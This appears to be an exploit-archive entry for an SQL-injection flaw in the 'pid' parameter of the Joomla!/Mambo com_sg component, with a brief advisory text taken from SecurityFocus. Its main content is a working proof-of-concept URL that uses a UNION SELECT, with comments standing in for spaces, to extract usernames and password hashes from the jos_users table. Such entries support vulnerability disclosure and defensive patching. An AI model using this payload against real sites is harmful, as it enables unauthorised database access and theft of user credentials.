Joomla! Mambo Component com_sg - pid SQL Injection

2008-02-15T00:00:00
ID EXPLOITPACK:98C16D6F1DD8FEA4304D8156C1DD468E
Type exploitpack
Reporter S@BUN
Modified 2008-02-15T00:00:00

Description

Joomla! Mambo Component com_sg - pid SQL Injection

                                        
                                            source: https://www.securityfocus.com/bid/27821/info

The Joomla! and Mambo 'com_sg' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 


http://www.example.com/index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,10,11,0x3a,0x3a,14,15,16/**/from/**/jos_users/*